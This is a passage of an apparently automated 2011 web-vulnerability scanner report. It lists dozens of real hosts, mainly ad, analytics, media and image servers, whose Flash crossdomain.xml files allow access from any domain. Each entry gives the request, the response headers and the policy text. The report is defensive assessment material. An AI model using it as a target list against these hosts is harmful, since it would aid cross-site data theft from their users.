<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
4.9. http://b.voicefive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Wed, 15 Jun 2011 00:16:56 GMT
Date: Tue, 14 Jun 2011 00:16:56 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
4.10. http://bs.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=2592000
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Tue, 14 Jun 2011 00:13:56 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.11. http://community.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://community.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: community.mtv.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:23:53 GMT
Accept-Ranges: bytes
ETag: "a4283dc02219cc1:0"
Server: Microsoft-IIS/7.0
Server: w06w
App: ww
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
Content-Length: 183
Date: Tue, 14 Jun 2011 00:27:49 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
4.12. http://d3.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d3.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d3.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 18 May 2009 07:34:56 GMT
ETag: "3a9d108-f8-46a2ad4ab2800"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 248
Date: Tue, 14 Jun 2011 00:28:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
4.13. http://d7.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d7.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Content-Length: 247
Content-Type: application/xml
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=6860
Date: Tue, 14 Jun 2011 00:28:50 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
4.14. http://daapiak.flux.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://daapiak.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: daapiak.flux.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:22:37 GMT
Accept-Ranges: bytes
ETag: "cc124932219cc1:0"
Server: Microsoft-IIS/7.0
Server: w06g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Content-Length: 247
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:08 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...
4.15. http://ds.serving-sys.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Thu, 20 Aug 2009 15:36:15 GMT
Server: Microsoft-IIS/6.0
Date: Tue, 14 Jun 2011 00:13:57 GMT
Content-Length: 100
Connection: close
Accept-Ranges: bytes

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>

4.16. http://en.gravatar.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://en.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: en.gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 14 Jun 2011 00:30:09 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
4.17. http://farm1.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm1.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm1.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 17:55:07 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...
4.18. http://farm2.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm2.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm2.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 17:16:19 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...
4.19. http://farm3.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm3.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm3.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 07 Apr 2011 22:37:29 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...
4.20. http://farm4.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm4.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm4.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Wed, 13 Apr 2011 15:31:30 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...
4.21. http://farm5.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm5.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm5.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Wed, 13 Apr 2011 16:10:03 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...
4.22. http://farm6.static.flickr.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://farm6.static.flickr.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: farm6.static.flickr.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Tue, 14 Jun 2011 00:24:37 GMT
Content-Type: text/plain
Content-Length: 265
Last-Modified: Thu, 14 Apr 2011 04:15:28 GMT
Connection: close
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitt
...[SNIP]...
4.23. http://fls.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Mon, 13 Jun 2011 20:44:07 GMT
Expires: Tue, 17 May 2011 18:17:24 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 12596
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.24. http://gs.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://gs.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, uses a wildcard to specify allowed domains, and allows access from specific other domains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: gs.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 21 May 2008 22:04:19 GMT
ETag: "5febfdd-222-c7459ec0"
Accept-Ranges: bytes
Content-Length: 546
Content-Type: application/xml
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:19:46 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/
...[SNIP]...
<allow-access-from domain="*" />
<allow-access-from domain="*" to-ports="*"/>
...[SNIP]...
<allow-access-from domain="*.mtvi.com" />
<allow-access-from domain="*.mtvi.com" to-ports="80,443,10000" />
...[SNIP]...
4.25. http://i0.poll.fm/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://i0.poll.fm
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: i0.poll.fm

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: text/xml
Date: Tue, 14 Jun 2011 00:32:50 GMT
Last-Modified: Tue, 15 Jun 2010 12:42:06 GMT
Server: nginx
Content-Length: 214
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-
...[SNIP]...
4.26. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 15-Jun-2011 12:02:44 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 12-Sep-2011 12:02:44 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...
4.27. http://imx.mtv.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imx.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: imx.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:20:17 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...
4.28. http://js.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: js.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:13:54 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.29. http://l.yimg.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: l.yimg.com

Response

HTTP/1.0 200 OK
Date: Mon, 13 Jun 2011 02:20:28 GMT
Cache-Control: max-age=315360000
Expires: Thu, 10 Jun 2021 02:20:28 GMT
Last-Modified: Mon, 01 Feb 2010 17:51:55 GMT
Accept-Ranges: bytes
Content-Length: 408
Vary: Accept-Encoding
Content-Type: application/xml
Age: 79361
Server: YTS/1.19.5

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xs
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
4.30. http://log30.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log30.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log30.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 09:19:04 GMT
Accept-Ranges: bytes
ETag: "034d21c5697ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:30:12 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.31. http://m.webtrends.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m.webtrends.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m.webtrends.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:762"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:34:17 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
4.32. http://m1.zedo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://m1.zedo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: m1.zedo.com

Response

HTTP/1.0 200 OK
Server: ZEDO 3G
Last-Modified: Mon, 19 May 2008 09:08:32 GMT
ETag: "1b42679-f7-44d91b52c0400"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: application/xml
Content-Length: 247
Date: Tue, 14 Jun 2011 00:29:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.zedo.com -->
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...
4.33. http://mswindowswolglobal.112.2o7.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mswindowswolglobal.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mswindowswolglobal.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:34:25 GMT
Server: Omniture DC/2.0.0
xserver: www420
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
4.34. http://mtv.mtvnimages.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mtv.mtvnimages.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: mtv.mtvnimages.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
X-Powered-By: mtvnimages.com version 1.5.56 (r248708)
ETag: W/"203-1306441848000"
Last-Modified: Thu, 26 May 2011 20:30:48 GMT
Content-Length: 203
Content-Type: text/xml
Cache-Control: max-age=63882
Date: Tue, 14 Jun 2011 00:15:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-polic
...[SNIP]...
4.35. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 14 Jun 2011 12:27:59 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...
4.36. http://om.dowjoneson.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://om.dowjoneson.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: om.dowjoneson.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:57 GMT
Server: Omniture DC/2.0.0
xserver: www68
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>
4.37. http://ping1.unicast.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ping1.unicast.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ping1.unicast.com

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 14:19:55 GMT
Server: Jetty(6.1.22)
Cache-Control: no-cache
content-type: application/xml
Via: 1.0 rhv192178010000 (MII-APC/1.6)
Content-Length: 1152
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
4.38. http://pix04.revsci.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...
4.39. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 15 Jun 2011 00:16:32 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 14 Jun 2011 00:16:32 GMT
Server: QS

<?xml version="1.0"?>
